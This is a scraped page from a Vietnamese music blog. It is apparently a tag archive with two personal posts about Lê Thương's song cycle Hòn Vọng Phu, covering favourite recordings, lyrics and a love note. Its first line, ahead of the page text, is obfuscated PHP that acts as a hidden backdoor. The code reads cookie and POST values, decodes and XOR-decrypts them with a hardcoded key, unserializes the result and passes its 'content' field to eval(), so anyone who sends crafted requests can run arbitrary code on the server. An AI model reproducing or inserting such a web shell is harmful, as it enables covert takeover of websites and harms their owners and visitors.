$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> hòn-vọng-phu – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Tag: hòn-vọng-phu

Hòn vọng phu – bản trường ca bất hủ của nền âm nhạc Việt Nam

Điều tôi cho là đáng tiếc duy nhất, trong sự hình thành và phát triển hơn 70 năm của nền nhạc tình Việt Nam, là ở việc có quá ít các “Trường Ca”. Điều này âu cũng dễ hiểu, đa phần các nhạc sĩ ở thời điểm đó toàn tự học sáng tác là chính, ít ai qua bài bản, trường lớp. Thêm nữa, thời buổi loạn li, cảm xúc đến bất chợt rồi đi cũng nhanh, người ta chỉ đủ thời gian để cụ thể hóa những phút thoáng qua đó bằng ca từ trong một ca khúc ngắn…

Cá nhân tôi rất thích nghe các bài Trường Ca, vì đó là những câu chuyện được kể bằng âm nhạc. Bằng những giai điệu, những lời nhạc tài tình, vị nhạc sĩ khi nào đã biến mình thành một ông già trong các câu chuyện cổ xưa, chống gậy đi khắp nơi để kể cho đời nghe biết bao nhiêu điều…

Nhạc Việt có những bài Trường Ca sau, mà tôi rất thích:
– Thiên Thai – Văn Cao
– Trường ca Sông Lô – Văn Cao
– Bình Trị Thiên khói lửa – Nguyễn Văn Thương
– Du kích Sông Thao – Đỗ Nhuận
– Con đường Cái Quan – Phạm Duy
– Hội Trùng Dương – Phạm Đình Chương
– Đóa hoa vô thường – Trịnh Công Sơn

và đặc biệt là Hòn vọng phu – Lê Thương.

***

Tôi nghe Hòn Vọng Phu vào tầm năm học lớp 10, thời mà Internet ở Việt Nam vẫn còn chưa phát triển lắm. Khi đó nhà tôi vẫn còn xài dial-up nên cũng không có thời gian lê la khắp nơi download nhạc. Nguồn nhạc duy nhất là từ mấy cái đĩa MP3 12ngàn/ đĩa bán đầy ở các hàng đĩa game.

Đại loại hồi đấy tuổi mới lớn, tôi cũng gọi là có chút gì lẩn thẩn, lơ ngơ, nên ra ngoài hàng đĩa chọn đĩa MP3 của Trịnh Công Sơn (hồi đó chỉ biết mỗi tên ông). Đĩa lậu nên làm hết sức cẩu thả, tên bài hát sai tới sai lui. Đặc biệt là, ai làm đĩa đó nhét luôn cả ba bài Hòn Vọng Phu vào, lấy tên nhạc sĩ Trịnh Công Sơn.

Tôi nghe đi nghe lại cái đĩa đó, nghe tới khi nó trầy đến mức cứ cho vào ổ đĩa là cái máy lại rít lên phì phì phì mới thôi. Bài tôi thích nghe nhất, lạ thay, không phải những bài rất nổi tiếng của nhạc sĩ họ Trịnh (như Diễm Xưa, Hạ Trắng, Em Còn Nhớ Hay Em Đã Quên? – dù tôi vẫn thích), mà là ba bài bị bọn đầu lậu băng đĩa nhét nhầm vào: Hòn Vọng Phu.

Khổ, xin lỗi nhạc sĩ Lê Thương – một trong những đỉnh cao nhất của dẫy Trường Sơn âm nhạc Việt Nam (theo lời ca sĩ Duy Trác), đến gần hai năm sau tôi mới biết ông là tác giả của trường ca nổi tiếng này.

***

Hòn Vọng Phu không thể nghi ngờ gì là một trong những bản trường ca nói riêng, hay bản nhạc Việt Nam nói chung hay nhất từ đó đến nay. Nhạc sĩ Lê Thương đã kết hợp tài tình những giai điệu của âm nhạc hiện đại Tây Phương với những âm giai ngũ cung của nhạc cổ truyền Việt Nam, điều mà sau này Văn Cao đã thừa nhận phong cách này ảnh hưởng đến ông rất nhiều. Hòn Vọng Phu ra đời, không cần tốn nhiều thời gian đã tự khẳng định vị trí của mình trong lòng người yêu nhạc, dù thể loại trường ca có cấu trúc dài như thế vốn kén người nghe. Điều này dẫn đến việc rất nhiều ca sĩ hay các ban hợp ca chọn trình bày, ấy âu cũng là điều may mắn cho nền âm nhạc Việt Nam.

Từ hơn nửa thế kỷ qua, số lượng bản thu của Hòn Vọng Phu là nhiều vô số kể, tôi không có ý định liệt kê toàn bộ, chỉ nêu ra vài bản thu mà cá nhân tôi cho là xuất sắc.
Cá nhân người trình bày bài Hòn Vọng Phu đạt nhất theo tôi là Thái Thanh. Thái Thanh từng trình bày trường ca Hòn Vọng Phu cùng với những ban hợp ca nổi tiếng như:

– Bản trước năm 1975 với ban hợp ca Thăng Long (Thái Thanh, Thái Hằng, Phạm Đình Chương, Phạm Duy), ban hợp ca nổi tiếng nhất miền Nam trước năm 1975. Bản này ttếng hát cao vút đẩy thổn thức của Thái Thanh (thuở giọng bà vẫn chưa bị thời gian tàn phá), cùng giọng bè đầy hào hùng, trầm ấm của ban hợp ca Thăng Long, tạo nên một tác phẩm vừa bi hùng, vừa thổn thức. (mời các bạn thưởng thức Thái Thanh & Ban Hợp Ca Thăng Long – Hòn Vọng Phu).

– Bản thu trong đĩa “Nhật Trường 5: Khi người yêu tôi khóc” cùng với Nhật Trường. Đây là một trong những bản thu mà giọng Thái Thanh theo tôi đánh giá là hay nhất. Đây cũng là một trong những bản đặc biệt vì có giọng ngâm thơ khúc đầu lấy từ Chinh phụ ngâm khúc của Đặng Trần Côn (Đoàn Thị Điểm) do Hoàng Oanh trình bày. Phải ngồi nhắm mắt lại, nghe thật kĩ bản thu này mới thấy nét độc đáo và sự kết hợp hay đến lạ tiếng hát đầy nội lực, tâm huyết của Thái Thanh, cùng sự lão luyện trong giọng hát Nhật Trường. Phần 2: Ai xuôi vạn lý do Thái Thanh đơn ca, có thể xem là phần trình bày đẹp nhất, theo ý tôi (mời các bạn thưởng thức Thái Thanh & Nhật Trường – Hòn Vọng Phu).

– Bản thu năm 1993 tại hải ngoại trong CD Hội Trùng Dương. Bản này Thái Thanh hát cùng ca đoàn Ngàn Thông. Ca đoàn Ngàn Thông là một ca đoàn có tiếng vang nhất định trong cộng đồng người Việt tại hải ngoại (đặc biệt là tại California). Ca đoàn Ngàn Thông của nhạc sĩ Thanh Lâm vốn nổi tiếng với những bản Thánh Ca. Tuy nhiên, họ còn được biết đến với việc hát bè, hòa âm và phối khí cho một loạt các ca sĩ hải ngoại thời điểm đó, nổi tiếng nhất là sự kết hợp với Ngọc Lan, và đặc biệt là CD Hội Trùng Dương cùng Thái Thanh.

Ngoài ra, còn có bản thu của ban hợp ca Thăng Long tại hải ngoại, khi này Thái Thanh chưa xuất cảnh, nên giọng hát nữ chính là giọng của Mai Hương. Bản này, giọng ca của Mai Hương không bằng được người cô ruột Thái Thanh của mình, nhưng phần hòa âm nghe hiện-đại hơn nhiều, với phần bè được đầu tư kĩ lưỡng hơn. Đó cũng có thể xem như là điểm nổi trội của bản thu này.

Cũng cần kể thêm bản của Ánh Tuyết ở đây dù tôi không ấn tượng gì lắm. Đơn giản là đối với đa phần khán thính giả Việt Nam sau năm 1975, bản thu của Ánh Tuyết là quen thuộc nhất, tần số xuất hiện trên các đĩa nhạc là nhiều nhất.

Lại vèo một phát không theo thứ tự thời gian, vào năm 2008, ban nhạc rock Unlimited đánh dấu một bước tiến lớn cho làng nhạc rock Việt, khi tổ chức chương trình kết hợp nhạc rock và nhạc giao hưởng. Tại UnlimiteD Symphony show này, Unlimited phối lại bản Hòn vọng phu cùng dàn nhạc giao hưởng thành phố cực hay, chỉ tiếc là họ đánh không trọn được cả 3 phần vì thời gian có hạn.

Các bản thu trên đa phần đều là những bản thu mà tôi nghe đi nghe lại không biết chán. Tuy nhiên, khiến tôi ấn tượng nhất phải là bản thu của Duy Khánh và Hoàng Oanh.

Bản thu của Duy Khánh và Hoàng Oanh trên đĩa nhựa Sóng Nhạc 45 được chính nhạc sĩ Lê Thương điều khiển phần hòa âm, hội tụ những nghệ sĩ nổi danh thời bấy giờ như: đàn cò Lữ Liên, sáo Tô Kiều Ngân, đàn bầu Ngô Nhật Thanh… Bản này có giọng ngâm thơ của Hoàng Oanh – người được đánh giá là “đủ tài ca ngâm”, một trong những giọng ngâm thơ hay nhất trong nền nhạc Việt Nam. Bản này xét ra, về phần nghệ thuật có thể không hay bằng các bản thu ở trên, nhưng độc đáo ở chỗ: phần Hòn Vọng Phu III được trình bày bằng lời hai.

Hòn Vọng Phu III thật ra có hai lời, nhưng đó giờ tôi chỉ thấy mỗi Duy Khánh & Hoàng Oanh trình bày lời hai của phần này. Không thể nói lời một hay lời hai là hay hơn, nhưng thật đáng tiếc nếu một phần lời ý nghĩa như thế trong một bài hát vì lí do nào đó bị các ca sĩ bỏ qua. Như bản Trương Chi của Văn Cao là một ví dụ (không có ca sĩ nào trình bày lời hai vốn cũng rất hay). Cả chục năm nghe Hòn Vọng Phu III, đã quá quen với lời một của bản này, nay nghe Duy Khánh hát những câu từ bi

Núi đá kinh hoàng nhắc câu sấm thề
Hỡi người chinh phu, anh hùng non sông
Trao người con quý cho người trông nom,
Thiếp xin lỗi thề

tới hùng

Núi đá thu reo đã lấp mờ bao nghìn xưa
Thấy đứa con xanh ngắt tới hồn còn trông đó
Cầm chiếc gươm chinh phụ di truyền
Chàng bế con trao lại gươm bền
Rồi chỉ vào sơn hà biến cố
Trao nó đi gây lại cơ đồ

hay

Chàng đã ghi trong sử xanh đời
Một mối duyên trung vạn kiếp người
cảm giác như được nghe một câu chuyện với một đoạn kết đầy thú vị khác.

***

Viết về Hòn Vọng Phu, đó đây nhiều người đã viết, tôi cũng không mong bài viết của mình được đánh giá cao về mặt cảm nhận, chỉ mong giới thiệu đến mọi người những bản thu hay và hiếm, cùng phần lời hai rất độc đáo của phần ba bài hát, để góp phần gì đó nhỏ nhoi trong việc gìn giữ và phát huy những nét đẹp nghệ thuật của nền âm nhạc Việt Nam.

***
07/03/2012,
B.l.u.e
.

Hòn Vọng Phu

Điều tôi cho là đáng tiếc duy nhất, trong sự hình thành và phát triển hơn 70 năm của nền nhạc tình Việt Nam, là ở việc có quá ít các “Trường Ca”. Điều này âu cũng dễ hiểu, đa phần các nhạc sĩ ở thời điểm đó toàn tự học sáng tác là chính, ít ai qua bài bản, trường lớp. Thêm nữa, thời buổi loạn li, cảm xúc đến bất chợt rồi đi cũng nhanh, người ta chỉ đủ thời gian để cụ thể hóa những phút thoáng qua đó bằng ca từ trong một ca khúc ngắn…

Cá nhân tôi rất thích nghe các bài Trường Ca, vì đó là những câu chuyện được kể bằng âm nhạc. Bằng những giai điệu, những lời nhạc tài tình, vị nhạc sĩ khi nào đã biến mình thành một ông già trong các câu chuyện cổ xưa, chống gậy đi khắp nơi để kể cho đời nghe biết bao nhiêu điều…

Nhạc Việt có những bài Trường Ca sau, mà tôi rất thích:

  • Thiên Thai – Văn Cao
  • Trường ca Sông Lô – Văn Cao
  • Bình Trị Thiên khói lửa – Nguyễn Văn Thương
  • Du kích Sông Thao – Đỗ Nhuận
  • Con đường Cái Quan – Phạm Duy
  • Hội Trùng Dương – Phạm Đình Chương
  • Đóa hoa vô thường – Trịnh Công Sơn
  • và đặc biệt là Hòn vọng phu – Lê Thương.

    ***

    Tôi nghe Hòn Vọng Phu vào tầm năm học lớp 10. Lúc đó, Internet ở Việt Nam vẫn còn chưa phát triển lắm. Khi đó nhà tôi vẫn còn xài dial-up, nên cũng không có thời gian lê la khắp nơi download nhạc. Nguồn nhạc duy nhất là từ mấy cái đĩa MP3 12ngàn/ đĩa bán đầy ở các hàng đĩa game.

    Đại loại hồi đấy tuổi mới lớn, cũng gọi là có chút gì lẩn thẩn, lơ ngơ, nên ra ngoài hàng đĩa chọn đĩa MP3 của Trịnh Công Sơn (hồi đó chỉ biết mỗi tên ông này). Đĩa lậu nên làm hết sức cẩu thả, tên bài hát sai tới sai lui. Đặc biệt là, bọn nhợn đó nhét luôn cả ba bài “Hòn Vọng Phu” vào, lấy tên nhạc sĩ Trịnh Công Sơn.

    Tôi nghe đi nghe lại cái đĩa đó, nghe tới khi nó trầy đến mức cứ cho vào ổ đĩa là cái máy lại rít lên phì phì phì mới thôi. Bài tôi thích nghe nhất, lạ thay, không phải những bài rất nổi tiếng của nhạc sĩ họ Trịnh (như Diễm Xưa, Hạ Trắng, Em Còn Nhớ Hay Em Đã Quên? – dù tôi vẫn thích), mà là ba bài bị bọn đầu lậu băng đĩa nhét nhầm vào: Hòn Vọng Phu.

    Khổ, xin lỗi nhạc sĩ Lê Thương – một trong những đỉnh cao nhất của dẫy Trường Sơn âm nhạc Việt Nam (theo lời ca sĩ Duy Trác), đến gần hai năm sau tôi mới biết ông là tác giả của trường ca nổi tiếng này.

    ***

    Có người nói đợi chờ là hạnh phúc, người thì bảo mong đợi là khổ đau. Không ai yêu nhau để ly biệt, không một cuộc tình nào muốn đồng hành với biệt ly. Nhưng điều hoàn hảo vốn dĩ chỉ là đặc quyền riêng của Thượng Đế…

    Tôi dần học được cách mỉm cười, khi người ta quên lời hứa sẽ chờ tôi.
    Tôi tưởng đã học được bài học rằng: trên đời này điều ngu ngốc nhất là bắt người khác chờ đợi mình.

    Những năm tháng xuân sắc ấy, trời ơi, lẽ nào tôi có thể ích kỉ đến mức muốn người chờ trong vô vọng…

    …chỉ là có nhiều điều biết không nên làm, mà người ta vẫn làm. Tôi không có ý định biến em thành hòn vọng phu, chỉ mong em, một khoảng thời gian ngắn, chờ tôi, em nhé!

    ***

    Hôm nay ngày Labor Day ở bên này, tôi được nghỉ. Sau khi quét dọn, rửa bát… tôi nằm dài đọc vài cuốn sách và nghe nhạc. Nghe đến bài “Hòn vọng phu” tự nhiên nhớ tới em ghê gớm, thành ra bật dậy và hí hoáy viết.

    Nói ngoài lề xíu về các bản “Hòn vọng phu”. Tôi nghe nhiều version của bài này, có những version cực ghét, có những version thích vừa vừa như của Hoàng Oanh – Duy Khánh, có version khá thích (UnlimiteD Symphony – đánh bài này cùng giàn nhạc giao hưởng thành phố, cực hay, nhưng chỉ tiếc là đánh không trọn bài), và có version rất say mê: Thái Thanh cùng ban hợp ca Thăng Long (Thái Thanh, Thái Hằng, Phạm Đình Chương, Phạm Duy), ban hợp ca nổi tiếng nhất miền Nam trước năm 1975.

    Version tôi đang nghe hiện tại, là version này. Tiếng hát cao vút đẩy thổn thức của Thái Thanh (thuở giọng bà vẫn chưa bị thời gian tàn phá), cùng giọng bè đầy hào hùng, trầm ấm của ban hợp ca Thăng Long.

    Người vọng phu trong lúc gió mưa,
    Bế con đã hoài công để đứng chờ,
    Người chồng đi đã bao năm chưa thấy về
    Đá mòn nhưng hồn chưa mòn giấc mơ

    Chờ anh, em nhé!

    -Hải

    null.

    © 2024 B.l.u.e. All rights reserved.

    Theme by Anders Norén.